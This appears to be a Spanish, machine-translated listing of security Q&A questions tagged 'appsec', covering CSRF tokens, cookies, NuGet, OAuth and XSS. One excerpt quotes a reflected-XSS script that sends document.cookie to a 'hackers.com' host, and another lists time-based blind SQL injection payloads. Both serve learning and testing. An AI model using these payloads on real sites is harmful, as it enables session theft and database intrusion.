Preguntas con etiqueta 'appsec'

preguntas con etiqueta
2
respuestas

¿Puede el Javascript malicioso en el archivo HTML local enviar archivos a Internet en Firefox / Chrome?

Descargue example.html -file desde un sitio web aleatorio a mi computadora de escritorio Abra example.html -file desde el escritorio con Google Chrome Ahora Chrome ejecuta javascript desde example.html -archivo que busca en los archivos de...
hecha 13.01.2018 - 00:19
2
respuestas

¿Cuáles son los riesgos de seguridad del Bus de servicio y cómo los mitiga?

El Service Bus es un software que puede ser instalado en Windows o alquilado en Azure y permite que alguien transmita información SOAP / WCF a través de Internet en forma de un XML sobre una carga útil HTTPS. Un riesgo que veo es que esen...
hecha 22.11.2010 - 20:56
1
respuesta

Ataque XSS reflejado mediante solicitud POST y carga útil XML

Sé que un XSS reflejado se puede hacer con una solicitud GET como: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Mientras la respuesta se vea similar a esto: <html...
hecha 15.09.2013 - 22:30
3
respuestas

¿Cómo se puede detectar si Apple / Google / etc. ¿Ha modificado una aplicación de terceros distribuida a través de sus tiendas de aplicaciones?

¿Existen métodos realistas para verificar que Apple o quien no haya manipulado la aplicación de terceros distribuida a través de su App Store? Por ejemplo, podría tener una aplicación de código abierto con desarrolladores ubicados en múltiple...
hecha 04.12.2011 - 22:56
3
respuestas

Longitud del token CSRF

¿Hay alguna longitud estándar del token que deba usarse al generar los tokens aleatorios? ¿Deberíamos usar el mismo estándar que usamos para generar ID de sesión?     
hecha 08.09.2011 - 21:52
2
respuestas

¿Es posible probar la inyección de Postgres BlindSQL usando pg_sleep () en una cláusula WHERE?

En mysql, estoy familiarizado con el uso de las siguientes cargas útiles para probar blindsql cuando la cláusula WHERE es vulnerable ( todos los ejemplos de carga útil de fuzzdb ): 1 or sleep(TIME)# " or sleep(TIME)# ' or sleep(TIME)#...
hecha 09.09.2011 - 22:19
3
respuestas

¿Existen herramientas para detectar llamadas WCF / AJAX basadas en JavaScript?

Me gustaría determinar si un JavaScript determinado contiene la lógica para realizar una llamada AJAX / WCF, o determinar si se está ejecutando uno en tiempo de ejecución. ¿Existe algo como esto?     
hecha 07.12.2010 - 04:55
3
respuestas

¿Hay alguna forma de usar Nuget de forma segura?

Visual Studio ahora incluye un Package Manager que descarga y actualiza paquetes de software desde Internet. El nombre común para esto es "Nuget" El problema que tengo es que cualquier persona puede pretender ser otra persona, por suplantar...
hecha 04.10.2011 - 06:06
2
respuestas

Cómo usar OAuth con Active Directory

Estoy creando un servicio REST WCF y quiero usar OAuth para autenticar la solicitud de cada usuario. Las cuentas de usuario se almacenan en Active Directory, por lo que tengo acceso a su nombre de inicio de sesión de AD en la aplicación cliente...
hecha 25.03.2012 - 06:20
2
respuestas

¿Qué protege las cookies?

¿Qué protege a las cookies de ser robadas? Después de todo, son solo archivos de texto. Un navegador que se porta mal puede dar mucha más información que a los maestros de web les gustaría. ¿Cómo sé que un navegador no proporcionará cookies de o...
hecha 21.11.2010 - 00:17